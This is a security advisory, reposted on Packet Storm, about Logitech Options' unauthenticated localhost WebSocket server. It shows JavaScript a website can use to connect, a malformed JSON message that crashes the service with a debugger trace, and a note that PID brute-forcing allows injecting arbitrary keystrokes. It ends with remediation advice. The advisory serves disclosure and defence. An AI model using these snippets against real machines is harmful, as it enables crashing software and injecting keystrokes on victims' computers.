what you don't know can hurt you

Logitech Options Craft WebSocket Server Missing Authentication

Logitech Options Craft WebSocket Server Missing Authentication
Posted Dec 12, 2018
Authored by Tavis Ormandy, Google Security Research

The Logitech "Options" craft websocket server has no authentication.

tags | advisory
MD5 | 351cebf77410e506f6772f6e57f6204e

Logitech Options Craft WebSocket Server Missing Authentication

Change Mirror Download
logitech: "Options" Craft WebSocket server has no authentication 




I wanted to rebind a button on my logitech mouse on Windows, apparently that requires installing 149MB application called "Logitech Options":

<a href="https://www.logitech.com/en-us/product/options" title="" class="" rel="nofollow">https://www.logitech.com/en-us/product/options</a>

That program helpfully adds itself to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (and therefore is always running), spawns multiple subprocesses and appears to be an electron app. It also opens a websocket server on port 10134 that any website can connect to, and has no origin checking at all. A website can simply do this:

x = new WebSocket("ws://localhost:10134");
x.onmessage = function(event) {console.log("message", event.data); };
x.onopen = function(event) { console.log("open", event); };

etc, etc.

Trying to figure out what this websocket server does, it's immediately obvious that it expects JSON messages, and there is zero type checking of properties, so it crashes like crazy.


socket.send(JSON.stringify({message_type: "tool_update", session_id: "00cd8431-8e8b-a7e0-8122-9aaf4d7c2a9b", tool_id: "hello", tool_options: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" }))

(14cc.cd0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
LogiOptionsMgr+0x163f5f:
00000001`3f293f5f 0fb7530e movzx edx,word ptr [rbx+0Eh] ds:00004141`4141414f=????
0:013> kvn4
# Child-SP RetAddr : Args to Child : Call Site
00 00000000`03bae390 00000001`3f2939b3 : 00000000`03bae530 00000000`00000000 00004149`69696961 ffffffff`ffffffff : LogiOptionsMgr+0x163f5f
01 00000000`03bae3e0 00000001`3f55b2f9 : 00000000`03bae468 00000000`04d27e60 00000000`0053f180 00000001`3f295e6b : LogiOptionsMgr+0x1639b3
02 00000000`03bae430 00000001`3f554e74 : 00000000`03bae610 6470755f`6c6f6f74 00000000`0000000b 00000000`0000000f : LogiOptionsMgr+0x42b2f9
03 00000000`03bae5b0 00000001`3f544c5d : 00000001`3f793b10 00000000`03bae780 00000000`00547540 00000000`03812cc0 : LogiOptionsMgr+0x424e74

(Here, tool_options was expecting an array, but it didn't check the type and I provided a string)

After figuring out some of the protocol, I realized it was this thing:

<a href="https://github.com/Logitech/logi_craft_sdk" title="" class="" rel="nofollow">https://github.com/Logitech/logi_craft_sdk</a>

The only "authentication" is that you have to provide a pid of a process owned by your user, but you get unlimited guesses so you can bruteforce it in microseconds.

After that, you can send commands and options, configure the "crown" to send arbitrary keystrokes, etc, etc.

Recommendations

*You must check origin* - discard any connection with a non-whitelisted Origin.

Second, require knowing a secret generated at installation time in a filesystem or registry location that is correctly ACL'd.



Found by: taviso

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    1 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close